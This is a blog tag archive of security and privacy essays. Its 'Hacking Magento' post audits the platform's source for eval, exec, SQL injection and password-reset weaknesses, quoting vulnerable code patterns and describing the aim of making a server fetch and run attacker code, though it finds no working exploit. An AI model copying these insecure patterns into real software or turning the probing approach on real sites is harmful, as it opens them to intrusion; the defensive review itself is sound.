Tag Archive for 'Security'

No Personally Identifiable Information

With our hardware advances alone — computers can extract, store and analyze significantly greater amounts of data than a few years ago — it becomes easy for those who have data to actually use that data. And the software has improved, too.

There are many reasons to feel, if not unhappy, at least slightly uneasy about the direction our information society is taking.

Really? What could happen to me if my private information was used by people or organizations?

For one, many people value privacy on principle. I feel that it is my unalienable right to hide information from others as long as that information does not harm them, even if making that information public would not cause me any discomfort or trouble. Recently, Spotify started auto-publishing what users listened to directly on Facebook. Even if telling your friends what music you are listening to hardly qualifies as discomfort or trouble, the fact that Spotify and Facebook took the decision to share that information is outrageous. That is my decision, even if the subject is of minor importance in the grand scheme of things.

Grow a spine. Who cares if you listen to Nickelback? Are you an angsty teenager?

It’s not only about listening to Nickelback. There’s also the oppressed, the minorities, those in a position of weakness who would suffer greatly if their church group knew they were gay, if their employer knew they were looking for another job, if their government knew they were printing pamphlets, if their friends knew they voted for another party…

The Electronic Frontier Foundation has written again and again about the implications of privacy invasions. A simple cell phone that records your location information could cause a lot of trouble:

  • Did you go to an anti-war rally on Tuesday?
  • A small meeting to plan the rally the week before?
  • At the house of one “Bob Jackson”?
  • Did you walk into an abortion clinic?
  • Did you see an AIDS counselor?
  • Have you been checking into a motel at lunchtimes?
  • Why was your secretary with you?
  • Did you skip lunch to pitch a new invention to a VC? Which one?
  • Were you the person who anonymously tipped off safety regulators about the rusty machines?
  • Did you and your VP for sales meet with ACME Ltd on Monday?
  • Which church do you attend? Which mosque? Which gay bars?
  • Who is my ex-girlfriend going to dinner with?

Then don’t use a smartphone — don’t use tracking technology if you don’t want to be tracked.

Smartphones, I can do without, even though it seems these days most people cannot. But the internet? Not only does every site track what you do on that particular site, but there’s a growing tendency for some companies to track you across multiple unrelated sites — Google and Facebook are only the tip of the iceberg. We are still far from a solution for people to say « do not track me » let alone actually enforcing that solution.

Credit and debt cards follow the same principles — your bank or credit card company knows where your are buying from, and what amounts you are buying. Your phone company knows who you call, when, and for how long. And government agencies keep a lot of information about many things you do.

In isolation, all of that information is not very useful, but once the owners of these files start sharing them, they become a lot more distressing for us.

Distressing? Why?

Below the surface lies our old human habit of appearing to others as we wish to appear, which for most of us involves hiding some elements and sometimes lying about others. We are weak, boring, average, struggling and unhappy, but we wish to appear strong, interesting, exceptional, successful and happy ; and there are few, if any, whom we trust to see our real selves. Maybe the would would be a better place if everyone was fully honest with others — no secrets, no lies, just sincere honesty — but that is not how we are, and uncontrolled publicization of information about ourselves will make many of us unhappy.

But those are faceless corporations sifting through my data with automated tools. Even if they could judge me, I wouldn’t care.

You need health insurance, but the insurance tells you that since you buy medicine far more often than the average citizen — it’s right there on your credit card transaction history — there must be something wrong with your health, so you will need to pay more. And you spend a few hours explaining that the medicine was for an ailing family member, not yourself.

A prospective employer determines that because you did or said something silly back in college, you should not be hired, but never explains why you were rejected.

You are divorcing, and your spouse’s lawyer digs up some innocent information from your cell phone or internet history which, out of context, makes you look extremely bad.

Even faceless organizations can judge you based on information. In fact, they would rather collect and buy as much information as possible about you, because they assume that you would lie about it.

Wait, wait, wait. You’re assuming that my insurance company could find out about my credit card history.

Yes, I am assuming that, and I know it sounds like paranoia. But there are evil people out there who see those huge databases full of tasty personal information and will try to get their hands of them. This has already happened.

Hackers regularly attack web sites and extract personal information from their databases.

It started as a security breach on the PlayStation network and other Sony services that exposed the personal information of 100 million users. From there, it has mushroomed into broader, ongoing security troubles across the Sony empire that have spilled out into the wider world.

Lawyers have used the courts’ power to subpoena ISPs for personal information of potential offenders, without the courts’ consent.

To summarize the staggering chutzpah involved in this case: Stone asked the Court to authorize sending subpoenas to the ISPs. The Court said “not yet.” Stone sent the subpoenas anyway.

Recently, the German government used trojans to extract communication information present on computers.

[...] the German-based Chaos Computer Club announced it had examined a Trojan horse program allegedly spread by government officials to secretly spy on citizens’ Internet travels, e-mail, chat and more. The software, originally intended only to help officials intercept Internet phone calls through legal wiretaps, went far beyond those permissible purposes, the hacker group alleged.

Individuals, corporations, governments, everyone has done it and will probably do it again at some point. Just because something is illegal or forbidden does not mean it will not happen. Nor does it mean that laws cannot be later adapted or extended to allow previously forbidden behavior.

I do not trust groups of humans to act in a responsible and independent manner. If the underlying principles of a technology makes invasions of privacy impossible or very difficult, I will feel safe and secure. If the only guarantee is a promise, however strong or binding it may appear, then I might as well assume that there is no privacy.

What if they guarantee that there is no personally identifiable information collected ?

That is usually a promise — an intentional anonymization process that could be removed at a later point. But even assuming that they are honest and will remain forever honest, « personally identifiable » is hardly a concrete property of information. If you are the only person in your ZIP code born on a specific day, then ZIP code + birth date is a personally identifiable information about you. And indeed, 87% of the US population can be identified using only their ZIP code, birth date and gender.

Your facebook browsing history, never mentions your identity, but I can guess you who you are based on which Facebook profile you visit the most — yours — using a simple frequency analysis algorithm.

The only way to make sure that no personally identifiable data is stored is to make sure that it is deleted.

Article Image © Andrea Roberts — Flickr

A Decentralized Dating Protocol

I’ve been wondering about how a decentralized dating protocol could be implemented.

Here’s the idea : Alice would love to date Bob, and Bob would also love to date Alice, but both of them are too shy to actually ask the other out. The good news is, Alice and Bob are the protagonists of almost every single cryptography protocol out there, and they naturally have asymmetric encryption keys. So, they resort to using the MAP (Mutual Attraction Protocol) to reveal whether they are interested in each other, but only if the feeling is indeed mutual.

An elementary implementation of the protocol could behave as such:

  1. Bob wishes to tell Alice about his feelings. He concatenates a fixed ILOVEYOU prefix and random suffix RAND, encrypts it with Alice’s public key APub, then with his private key BPriv, This creates the cipher BPriv(APub(ILOVEYOU || RAND)).
  2. He then publishes the cipher to a public location in a way that can be easily found by anyone looking for it — such as a database indexed by the public key of the uploader.
  3. Alice wishes to know whether Bob has feelings about her. She scours the public databases for any items matching Bob’s public key, and stumbles upon the aforementioned BPriv(APub(ILOVEYOU || RAND)) cipher.
  4. Shen then decrypts it with Bob’s public key, and uses her own private key to decrypt the result. She ends up with ILOVEYOU || RAND and determines, based on the presence of the initial ILOVEYOU that there’s indeed a love interest around.

The protocol is of course symmetrical: when you wish to express your interest, you should both publish it to the public database and look through that database for a reciprocal interest.

This version of MAP has the following interesting properties:

  • Only Bob can publish Bob’s feelings on the public database, because doing so requires encrypting them with Bob’s private key.
  • Only Alice can determine whether a given entry on the public database is about her, because doing so involves her own private key.

However, it assumes that Alice will only search for Bob’s message if she is herself interested in him. This is not necessarily true : Alice might be running some software that automatically searches through the public database for people who like her. This clearly violates the constraint that the feelings should only be revealed if they are indeed mutual — that, before Alice can determine whether Bob posted an “I’d date Alice” message, she must post an “I’d date Bob” message herself for Bob to read.

The question I am stuck on is, can these constraints be implemented without involving a trusted third party ?

Article image © Nattu — Flickr

Compiler-Enforced Access Control System

My apologies to my non-technical readers: this article is going to be a hairy, brain-roasting piece of technical innovation. The same goes for my technical readers not familiar with Hindley-Milner.

The Problem

An access control system is a piece of software architecture that makes sure only authorized users can access certain parts of the software. Access restrictions are usually defined as rules in a variety of formats. The most basic ones apply to general user categories and features: for instance, only a moderator (user category) can ban another user (feature). Rules can get extremely complex. For your amusement, here’s a real-life example:

The event page may be edited by the creator of that event page, by the moderator of any of the groups in which that event was posted, or by any global administrator account, as long as the editing user has entered their password at least once since they entered the website.

As a software architect mindful of the safety of your data, you have a few basic requirements for any access control system:

  • Exhaustivity: no access should remain unchecked. It’s usually easy to determine through code reviews if a developer forgot to write the access-checking code for a feature. But that code is even slightly off, you have a potential disaster on your hands. This is usually solved by applying obscene amounts of testing, both automated and human, to check if all unauthorized accesses are denied by the system correctly.
  • Predictability: one should tell if an operation is possible without actually trying it. This is useful for hiding unavailable buttons, displaying error messages in advance, or simply acting in a transactional manner when rollback is not available. This is usually solved by factoring out the code that does the access-checking, and call it both from the actual operation, and from any code that is about to run the operation and wonders if it can be done.
  • Readability: since documentation inevitably goes out of sync, the code should be readable enough by itself to determine what the access rules are. A 50-line sequence of API calls, database queries and well-named variables will require some reverse engineering, no matter how well-named the variable are.

This is pretty hard to achieve, mostly because every single project out there contains code like the one below:

User.checkRecipientList(Request.recipients, Request.user)

foreach (var recipient in Request.recipients)
{
    var email = new Email();

    email.From = Request.user
    email.To   = recipient;
    email.attach(file);
    email.send();
}

Of course, the main danger is that the Email class was not written to check that the sender can indeed send a message with an attachment to the recipient. Of course, this can be solved through code reviews, which scan all classes in search of missing access control code, and functional tests, because the specs said an error message should appear. These are costly, tedious solutions that eliminate that problem. However, assuming that the class was indeed written correctly, there’s another problem:

  • The sending either fails silently (no user error message: bad user interface design!) or throws an exception which results in a partial sending (you can’t cancel email once it is sent).
  • The compiler has no reason to complain or warn the developer about anything.
  • The developer wrote this code at 7 p.m. and had something else to do on the next morning.
  • The code reviewer and unit tester didn’t know there was a special rule about sending attachments, and expect User.checkRecipientList to throw an error if a recipient is invalid.
  • The code coverage tool is perfectly fine with this.
  • The specs merely said «an error appears if a recipient is invalid»

In short, this piece of code contains a time bomb that no user or software can detect until it happens.

The Tools

Before I explain what I’ll be doing, I need to describe the tools I’m going to use. As you might have guessed from the Hindley-Milner reference above, I’ll be using a variant of ML, namely Objective Caml. The language provides a sophisticated type system, entirely checked at compile-time, and which can be almost completely inferred from the code (that is, you almost never have to add type annotations to your programs). For instance :

let print_integer x =
  printf "The integer is %d" x

print_integer "hello"

This code defines a function called print_integer that accepts a single argument, and uses the classic printf function to print it. It then tries to call that function with a string argument. The Objective Caml type inference algorithm will look at the format, which contains a single %d, and deduce that it expects a single integer argument. From there, it deduces that the first argument to print_integer should be an integer, and the function returns nothing : int -> unit. As a consequence passing a string is a type error :

This expression has type string but an expression was expected of type int

A highly expressive compile-time type system means we can use it to prove important properties about our software, but it increases the size of type expressions (because types have to carry more information) : and type inference means we won’t have to write those long type expressions everywhere.

Objective Caml types are parametric, which works a bit like generics in C# and Java. The type system automatically infers the type parameters from the code :

let first_element array =
  array.(0)

In this example, the type of the function would be correctly identified as 'a array -> 'a : accepts an argument which is an array of a generic type 'a, and returns an element of that same type 'a. There are plenty of parametric types in the standard library alone : 'a array, 'a list, 'a option

The latter is the Objective Caml replacement for null values : the language does not allow values to be null (when you say a variable is an array, then it’s always a valid array), so values that might be missing are explicitly tagged as optional using the option type. For instance, when you’re looking for an item in a database, you might want to return an optional type to represent the situation where the item is missing. While exceptions would interrupt the control flow and rise up to the nearest try-catch block that can handle them, using options forces the developer to decide on the spot what he wants to do with the value, usually with pattern matching:

match Database.read id with
  | Some item -> frobnicate item
  | None      -> frobnicate default_item

Options have the advantage that you can’t forget to handle the null case, because you have to use pattern matching to access the returned value. On the contrary, you can always forget that an exception might be thrown (and it’s not obvious when doing a code review, either).

The Solution

Another important element of the Objective Caml type system is the ability of modules to hide away type information. Consider the following example :

type 'a page = { password : string ; id : int }

let read page =
  Database.read page.id

let write page content =
  Database.write page.id content

let unlock page password =
  if password = page.password then Some page else None

let lock page =
  page

This is an elementary access control system : you can read both locked and unlocked pages, but once you lock a page, you need to unlock it with a password before you can write to it again. Looking at the code above, this doesn’t appear at all : theres no locked/unlocked boolean variable on the page, which means I could pass a locked page to the write function and it would not complain about it at all! The lock function merely returns its argument without doing anything to it! The only password-related code is the unlock function, which does indeed check that a page is password-protected, but there’s no need to unlock a page before it’s written to…

The unnecessary type parameter on the page type should have been a hint, and it all becomes clear when one looks at the module signature :

type 'a page

val read   : 'a page -> string
val write  : [`Unlocked] page -> string -> unit
val unlock : [`Locked]   page -> string -> [`Unlocked] page option
val lock   : [`Unlocked] page -> [`Locked] page

This module signature describes how every other module in the system will see our page-related functions. It hides the definition of the page type, to prevent people from accessing its fields directly, uses the seemingly unnecessary type parameter to carry additional information about the locked/unlocked state of the page, and it restricts the type of the write function to only accept pages which are unlocked. All of this is allowed : as long as the signature defines a type that’s more restrictive than the actual type inside the module, it’s still going to work.

So, from inside the module, the page is fully accessible regardless of its locked/unlocked status, but outside the module, the locked/unlocked status is enforced at compile time by the type system. This is very important : if you try to write to the page without asking for a password first, you don’t get a runtime exception, you get a compiler error message. And a pretty clean one, too:

This expression has type [`Locked] page but an expression was expected of type [`Unlocked] page

Also, since the definition of the page type is hidden away by the module signature, the only way to create an unlocked page is with the unlock function above.

As for performance, once the software is compiled, all of this vanishes into nothingness : Objective Caml only uses type information for checking the validity of the program, and discards it from the final binary.

All of it using only standard language features. Can your language do that? ;)

This approach revolves around proving that you have access to a certain feature of a certain object. That proof is created by a first function (the provider) , placed in the type parameter of the object, and required by a second function (the consumer) that actually performs the intended operation. In the example above:

  • The unlock function is a provider : it proves that the user knows the password by placing [`Unlocked] in the type parameter of the page.
  • The write function is a consumer : it expects the page to be [`Unlocked] before it writes data to it.

In short, you have providers that perform the access control tests (is this user authenticated? is he an administrator? does he know the password?) and then securely store the result of those tests to be used by the features they are protecting. The type system prevents the users from using features without successfully calling the providers first, and the module system lets you write providers and consumers without having to define brand new types all the time.

The security comes from the fact that if the consumer expects a certain proof (as an argument of specified type) then that argument was necessarily returned by one of the providers able to create that proof. Tight control of proof providers (made possible by the fact that providers are always in the same module as the one that defines the type that carries the proof) combined with responsible and conservative definition of consumers helps keep a system safe and secure.

A Few Examples

In practice, the proof that is being carried around takes many shapes, the two main ones being about proving who the user is, and proving what the user can do. The provider of who-proofs is the authentication system, which digs up information about the user from the cookie, the session and the database, and concludes about its nature:

type 'a user

val current_user : [`Unknown] user
val as_admin     : 'a user -> [`Admin] user option

It’s fairly common to transform who-proofs into what-proofs based on generic rules such as “an administrator can edit everything“:

type 'a page

val edit_by_author : 'a page -> 'b user-> [`Editable] page option
val edit_by_admin  : 'a page -> [`Admin] user -> [`Editable] page
val edit           : [`Editable] page -> string -> unit

This illustrates the difference between absolute rules and conditional rules : “an administrator can edit everything” is an absolute rule, because it’s always true, whereas “the author can edit his creation” is a conditional rule because the user might not be the author of the page. This is outlined in the example above by the fact that one function returns an option (indicating the possibility of failure) while the other does not.

The edit-by-author property could also be handled by representing ownership as a proof on the page :

val is_author      : 'a page -> 'b user -> [`Owned] page option
val edit_by_author : [`Owned] page -> [`Editable] page

As an example, the above can be used to construct a generic “editable” function that accepts any page and user as an argument, and proves whether the page can be edited by the user :

let editable page user =
    match is_admin user with
    | Some admin -> Some (edit_by_admin admin page)
    | None -> match is_author page user with
              | Some owned -> Some (edit_by_author owned)
              | None -> None

val editable : 'a page -> 'b user -> [`Editable] page option

Another example would be giving another user a token that they can use to edit a page, but do nothing else :

let prove_editable page =
  hash (secret_key, page.id, "editable")

val prove_editable : [`Editable] page -> string

let check_proof_editable proof page =
  if proof = hash (secret_key, page.id, "editable") then Some page else None

val check_proof_editable : string -> 'a page -> [`Editable] page option

This effectively lets you serialize a proof to a string, and later unserialize it to allow edit access to a user that normally couldn’t have edited the page.

Brain Dump

HTML 5 Advertising. Many ads these days come as Adobe Flash-based video. Given that Apple still has no plans on providing Flash support on their iPhone or iPad, surely they would look for an alternative solution? It looks like they have: their recently announced mobile advertisment platformiAd, will provide video ads using HTML 5.

The Mind as a Security Vulnerability. The core of every security flaw is an user mistakenly allowing someone to do something unintended. Our inability to know everything or check everything is fundamental here. For instance, we check whether a site we visit is who it pretends to be on the first visit, but not when leave the tab and come back to it again. Phishing (and conning) is an interesting form of psychology research : looking for unconscious assumptions about the world.

The blogger’s approach to Privacy. I blog under my real name. So, don’t expect to find on this blog tales of my decadent nights of heavy drinking (assuming for a moment that such nights did exist). I apply the same restraint to all my activities online : whenever I would post something anywhere on the internet, I ask myself whether I would post it on my own blog, so I know I don’t have to be afraid of the weekly facebook privacy policy changes.

The ban on laptops. In an ideal world, only one laptop is allowed in every meeting, and only if there must be some computer-based presentatio involving that laptop. If you have trouble pushing a laptop ban agenda, remember that Bhutan did it back in 2008. If a government does it, why shouldn’t you?

Easier Turing Test. The turing test determines whether an artificial intelligence is sneaky enough to pretend being a human by having a long text-only conversation with an actual human. These days, many data sources aim for quantity instead of quality. How easy is it to have a computer program pretend to be a reputable source of news? SnarXiv already does this for scientific papers, and is nearly undistinguishable from actual arXiv listings.

Referrers, Webmails and Competition

When you visit a web site, that web site remembers your request, along with some information about that request. Here’s some data that the Apache web server remembers:

  • 217.111.148.194 : your IP address
  • [26/Apr/2010:13:02:15 +0200] : when you visited
  • GET /ladies/naughty.avi : what you asked for.
  • https://www.facebook.com : the page where you found the link to the current page
  • Mozilla/5.0 : your browser
  • Windows NT 6.0 : your operating system

It is of course possible to eliminate most of that information (only the first three are required). It is the fourth, however, that can cause havoc: people know where you come from.

Consider now what would happen if your corporation uses some kind of webmail. Something like http://mail.google.com/a/myCompany or http://intranet.myCompany.com/zimbra. Suppose that one of your co-workers send you an e-mail about a new feature from your competitor that you absolutely have to see. In that e-mail is a link. You click on the link.

Since the e-mail was displayed as a web page in your web browser, its address will be sent to your competitor’s server. Now your competitor knows that your company is exchanging mails about their latest feature.

Some web mailers protect you against this. Check it out.

Gradual Response

When designing an online server, some high-overhead operations (such as search) tend to decrease performance a lot.

One possibility is to ignore the issue. After all, you can only optimize search so much, and you only have so much money to go around for installing slave databases and extending web farms. The vast majority of small websites developed on a tight budget will tend to use this approach.

This opens the website to denial of service (DoS) attacks where an attacker can hit the server by sending large amounts of requests that take a lot of time to process. Imagine your one-database, one-server web site being hit by a hundred search requests per second—unless you have no content, the search operation will clog the tubes for every other visitor.

The solution is, of course, to limit repeat requests. No legitimate human user will submit ten search queries in ten seconds, so you may choose to detect such requests and prevent them from being executed. This can be done using the session data (very fast) if it’s available, and by persisting IP and timestamp data to the database for session-less visitors.

This creates a different issue: if you trigger the defense mechanism too easily, you can frustrate normal users. But making the trigger less sensitive is harder, because it cannot use the simple “if last request happened less than X seconds ago” approach. Case in point: go to www.magentocommerce.com and use the search box:

  • Enter a first search query, with a small typo.
  • Quickly correct the typo and re-submit the query.

If you did that in less than fifteen seconds (as most programmers certainly can) you will end up with a denial page.

A gradual response is always a good idea. If you get two queries in a row, it can still be a legitimate user. It might be a good idea to choose higher values of N in the “allow only N requests in T seconds” rule, so that it takes N requests to execute.

Another way is to delay the requests instead of simply refusing them. So that the second request in 15 seconds redirects to a “waiting page” for 15 seconds before resolving—it also helps the legitimate user determine when the query is available again, so that they do not search again one second too early and reset the 15-second timer again.

Copy Protection

You’re a software developer, and you’ve just developed a new piece of software that you now want to sell. But there’s the problem: your customers are greedy schemers out to get you. You’ll get one paid download from them, and then they’ll make the software available online for free and you won’t get another cent from it ever.

Never mind, you say, I can always include copy protection in my software!

Arr! Here be bytes and checksums!

Arr! Here be bytes and checksums!

No protection is cracker-proof

Any software that runs on the user’s computer is vulnerable. What you have just given your customer is a complete description of how the program works, and any dedicated cracker can alter that description so that the copy protection behavior is disabled. No amount of skill or cleverness is going to save you here: you can not stop the cracking process, you may only slow it down.

In fact, the objective of the copy protection of most games is just that: to slow down the crackers long enough for the game to make a profit (since most sales for games occur right after its release).

So, you will be looking for the optimal amount of copy protection to include in your game: too much, and you will be spending more money than you’ll ever earn, too little and hundreds of people will be seeding a torrent for your program within one day.

No protection is harmless

The problem with copy-protection is that it needs to determine whether the program is being used in a legitimate way. This is extremely hard to do correctly (even if you ignore the issue of crackers for a moment), because the very definition of legitimate use is complex.

See, an user can use a program if they bought it from the developer. The problem is that your average computer has no biological identification features that could be used to identify the user, so you must rely on other ways of gathering that information such as:

  • Requiring that the user inserts the original CD, connects an USB dongle or enters a key.
  • Using an internet connection for verification.
  • Locking the software to a single machine.

All of these are annoying to the user if they work correctly (can you backup your Wii games, or play single player Portal without an internet connection?), and can be downright damaging to your reputation if you push things too far. In fact, customers have regularly managed to pressure the copy protection away.

What else?

One solution increasingly used by many developers is to go online. You cannot crack World of Warcraft, because the code that runs the game servers … runs on the game servers! If you have no access to code, you cannot make it act differently. So, short of knowing the login/password to an account that was paid for, you cannot connect to the game servers. And, best of all, this kind of protection doesn’t even feel like protection to users: it’s perfectly normal to have to provide a login/password to connect to a multiplayer game (otherwise, how would the game know who you are and who your characters are?) and no one would give away their login/password online because their account might be stolen by others.

So, if you can move any significant part of your operation online, you can have your customers pay for that part (whether this means anti-virus updates, video game servers or content) and it will both feel natural and be immune to cracking.

If we were to broaden these definitions, we could say that anything you can offer which makes the software more valuable is something you can sell. A lot of open source software work this way: you can download our program for free, and if you have any trouble using it or extending it, we’ll be happy to provide help for a fee!

But there’s something else. Something that has to do with how people cheat and steal when they think they can get away with it, unless you remind them that stealing is bad.

A three-step approach

Suppose that your program does not have anything to offer online: updates happen few and far between, there’s no online content and no support. It’s just a simple, ten-dollar tool. You’re not going through a retailer either: you’re small, so you sell your software online, and you cannot rely on any physical security (such as a dongle or a CD).You have three objectives:

  1. To create and amplify the incentives to buy.
  2. To prevent the customers from redistributing their software.
  3. To prevent  the prospects from downloading a free version.

What kind of copy protection do you include?

I would say, none, and make this statement on the sales website:

No Copy Protection

We decided not to include any kind of copy protection in FooBar™. Copy protection always ends up causing trouble to legitimate customers : we don’t want you to remember a registration key, keep your computer connected to the internet or give us a call when you buy a new computer.

We strongly believe that if you paid for it, then you should be able to use it : restricting what you can do with your software is just as bad as downloading paying software for free.

Unlimited Downloads

Once you buy FooBar™, you can download it as many times as you want, and install it on any number of computers you own: just connect to your online account and you will have unlimited access to the latest version of FooBar™.

Warning: revealing your account number and password or giving out your copy of FooBar™ may let other people connect to your control panel and steal the account by changing the password.

What does this message achieve?

  • The absence of copy protection is used as a feature: if you do it, you might as well get a few sales from it. This part is a promise: you won’t be having these issues with our product. Obective 1.
  • The “we strongly believe” part creates a connection with the reader, and shows that we think about his satisfaction instead of our money. It also stealthily introduces the concept that “downloading software for free” is bad. So, if the reader was considering to look for a free torrent of the software, they will feel queasy because it’s “bad”, and because it feels like betraying us when we’ve done so much for them. Objective 3 (and, for a small part, 2).
  • It goes one step further and lets you download and install the software as many times as necessary with no restrictions. If this feature were presented on its own, it would probably feel out of place: people don’t need that. But by placing it right after our copy protection discourse, it actually feels like a natural consequence: “not only do we let you install your software as you wish, but we actually help you do so by providing you with a download”. Objective 1.
  • It warns against the consequences of redistributing FooBar not in terms of “you’re an evil cracker” (accusing prospects of anything is a bad way to turn them into customers), but rather in terms of “evil persons could steal the software from you”. We rely on loss aversion to have people avoid losing a service that, while useful, isn’t necessary for them to use the software, but we also espect smarter customers to infer that if evil thieves can determine the account number from the executable, so can we. Objective 2.

All you need to make this seem plausible is a watermarking process: when someone downloads the software, you give them a copy of the executable that contains the account number and the name of the buyer (readily available in, say, a “Licensed to:” subsection on the “About” menu). The crack in itself isn’t exceedingly difficult to perform: just get a legal version and either distribute it for free or remove the buyer’s name if you wish to protect him.

There’s another way to fight towards objective 3. Where do most people look for pirated software? Peer-to-peer networks, torrent search engines, and the classic search engines. So, if you manage to publish enough incorrect “free versions”, finding an actual free version might end up being too hard for people to find. If your software does cost $10, how long do you expect people to spend looking for a free version? Not much. $10 is what many people spend for lunch.

Hacking Magento

My evil hacker side is rampaging the virtual countryside again. This time, I’m scanning Magento for exploits and vulnerabilities. 

If you like what you see here, or if you’re interested by more details about Magento, the web or the business of earning money online, make sure you subscribe to my rss feed to keep up with the latest articles on the topic. 

Anyway, let’s start with the easy stuff.

Eval

Once I download the code, the first step is to look for classic bug-prone functions. One example is the ‘eval’ function, which executes an arbitrary string as PHP code. Were such a function present in the codebase, I could look for ways of subverting the input string so that I can insert my own code in there and take control of the server.

A quick search of the code yields only two uses of ‘eval’, both of them in a google cart function that was deprecated because it was using ‘eval’:

if($value == "true" || $value == "false")
  eval('$this->'.$string.'="'.$value.'";');
else
  eval('$this->'.$string.'="'.$default.'";');

I scan for uses of that function (just in case someone ignored the deprecation) and get no results. Well, that particular exploit won’t be available here.

Exec

Another way is the classic family of shell execution functions: ‘exec’, ‘shell_exec’ and ‘passthru’, as well as the backtick operator that I’ve never actually seen used anywhere. These functions take a string argument and run it as a command on the server. Of course, this requires that the server is not secure and allows arbitrary execution of commands, but at least one server on the internet is bound to have this safety issue and run Magento.

So, if I could then corrupt the arguments to that call, I could have the server run what I want (usually, it would be downloading a PHP file from my own evil server and running that file with a direct query).

The basic ‘exec’ comes up as part of PEAR, mostly with constant string arguments, so no cookie there.

As for ‘shell_exec’, it comes up in Zend for the console adapter (that no sane person would use on the web), also with constant string arguments.

Finally, ‘passthru’ does not come up anywhere.

So, there’s nothing this way either.

SQL Injection

If I can’t take control of the server directly, I could at least get into the site admin, for instance by extracting the admin password from the database (or inserting my own in its place, if it’s encrypted). With access to the back-end, I could upload evil PHP files and get control anyway. So, I could try hammering the database with injection requests.

A quick search for “SELECT … FROM” yields no interesting results (all of them are within Zend, and I’m not going to look for exploits within Zend today). This means that Magento is using Zend for handling requests (by use of Zend_Table and the related functions) in order to reduce the probability of SQL injection. So far so good, but even Zend doesn’t eliminate the risk of SQL injection completely.

For instance, Zend relies on providing variables as arguments to its functions so that it can escape them itself. So, one would do (to build the ‘where’ part of a query):

$select -> where('parent_id > 0 AND user_id = ?', $userId);

But looking at a Magento file (one that’s part of the external API, and handles the users to the API) I find instead:

$select -> where("parent_id > 0 AND user_id = {$user_id}");

This code inserts the text value of $user_id directly into the request without any escaping or even checking, which makes it a possible vulnerability against SQL injection. This is getting excited: can I alter $user_id to get the request to do nasty things? Nope. Even though the SQL statement itself is risky, the variable is protected:

if (is_numeric($user)) {
  $userId = $user;
} else if ($user instanceof Mage_Core_Model_Abstract) {
  $userId = $user->getUserId();
} else {
  return null;
}

There are around 90 occurences of a “where” clause that contains an interpolated string within Magento. Every one of them is a potential security issue. All of them seem to be secured by argument verification, though.

Password Retrieval

Another way of gaining access to the administration panel is simply by getting the password. Joomla! had a vulnerability in this area not so long ago, for instance. Magento uses a fairly straightforward controller dispatch scheme, meaning that the “/admin/index/forgotpassword/” URL maps to functoin “forgotpasswordAction()” in the file “AdminHtml/controllers/IndexController.php”.

Peeking at the code for that function, I soon notice there’s no way I can get through. Unlike the Joomla!, the password is not set by the user, but rather re-generated by the server and sent back to the user. I can’t even insert my own email to receive the password: sending happens using a specific function that uses the user’s mail.

$user->sendNewPasswordEmail();

Another technique would be to somehow predict what password was generated by the server and plug it back in to connect. The password is generated as such:

$pass = substr(md5(uniqid(rand(), true)), 0, 6);

Now, that’s quite interesting. The server first generates an md5 hash: the characters inside the hash are fully random and unpredictable (unless I can somehow identify the initial state of uniqid and rand when I performed the re-generation, but that was designed to be impossible). Then, it selects the first 6 characters of the hash and uses them as the password. This means that the password contains six hexadecimal figures: there are 16 million possible passwords there, which is far weaker than the safety of a 6-character alphanumeric password (64 billion possible passwords) and ridiculous when compared with an 8-character password containing digits, numbers and punctuation (up to 70 million billion possible passwords).

Of course, this is nothing groundbreaking: 16 million possible passwords is plenty to be safe, especially since they’re randomly chosen and therefore impossible to guess without full brute-force. Besides, to do it, you would need to know the administrator username and email (which can be obtained through a minimal amount of social engineering).

Either way, an improved password-generation method would be to use base64_encode to generate alphanumeric passwords instead of just hex passwords like the above:

$pass = substr(base64_encode(md5(uniqid(rand(), true), true)), 0, 6);

This brings back the number of possible passwords to 64 billion, which is beyond brute-force.

This doesn’t eliminate the annoyance of changing the password without a confirmation e-mail: as soon as you know the administrator’s mail, you can generate a new password as often as you want, and you can even do it fast enough to make the “read password from mail and write password in box” process too slow to use the latest password, or even have the mail-sending script burst (because it’s blacklisted for flooding, for instance) and leave the user with no password.

Related Posts

Invalid Assumption

Yesterday, I stumbled across a DailyWTF article that showed overlooked errors, unsual bugs and other incorrect statements. At the bottom, a screenshot of a PDF containing a State of Georgia Department of Revenue form, with detailed instructions explaining how to download Adobe Reader. The irony of a document containing instructions on how to open it (something which would have already happened by the time the user read the instructions) is the reason for including that document on the DailyWTF website.

Is it really that obvious?

The Portable Document Format

Suppose for a moment that you’re not the Windows-using experienced developer you are (or you might be, if you read this blog or the DailyWTF). Perhaps you’re a hardcore Linux user who opens his Portable Document Format with xpdf instead of Adobe Reader (the document being portable is quite the point of the format). Or you might be using OS X. Or perhaps you’re running some older version of Adobe Reader than the 8.0 in the document.

This is where the real irony begins—despite being an open standard, advertised as being portable, PDF is not really that portable. Sure, you can open old PDF documents on any operating system with a large variety of readers from Adobe’s own to xpdf to evince to flash-based readers (courtesy of pdf2swf), not including the various conversion tools (to PostScript, to a bunch of PNG images, to HTML, to plain text).

But later versions of the PDF standard have introduced many features that few readers (aside from Adobe Reader) manage to support.

Taking a look at the standard (there’s a free version on Adobe’s web site) is an enlightening experience: what used to be a simplification of PostScript (mostly, removing the turing-complete parts of the language) has now included the ability to carry SWF, javascript for manipulating a DOM-like construct, user-entered data, digital signatures, and many other elements.

Consider, for instance, the ability to fill in a form in a PDF document. Chapter 12 in the PDF 1.7 standard tells us that this feature exists since PDF 1.2 (released in 1996 with Adobe Acrobat Reader 3.0). Obviously, most non-interactive renderers (such as converters) don’t support interactive features in PDF documents, of which forms are a part. But that’s also the case for some interactive viewers: xpdf, kpdf and evince users will see the form, but will not be able to fill it in.

Of particular interest is the way in which Adobe benefits from the wide distribution of its Adobe Reader, even though it is provided free of charge to anyone who wishes to download it. Aside from the elementary document-displaying functionality, which is reasonably well duplicated by other readers (including those from the Open Source world), Adobe Reader provides several pieces of locked functionality. Among these:

  • Saving a modified PDF file to the disk (including form field contents).
  • Applying a digital signature to a PDF file using the reader.
  • Sending a PDF file by e-mail from the reader (again, including form field contents).

The reader provides this functionality whenever it reads an “enabled” PDF file. One way of enabling files is to use the Livecycle Reader Extensions service (that tends to cost quite a lot), another is the smaller-scale Adobe Pro (a bit cheaper, but limited to 500 readers).

But wait, you think, if the format is open and the enabled/disabled status is part of the file, surely an open source PDF writer could enable files for free? Sadly, no, they couldn’t. While some features (such as signing a document outside of Adobe Reader) can be performed by anyone, enabling files cannot. To check if a file is enabled, Adobe Reader will determine whether the creator has signed the file with an appropriate private key—the details are a bit more complex, but that’s the idea—and so to enable a file you need that private key.

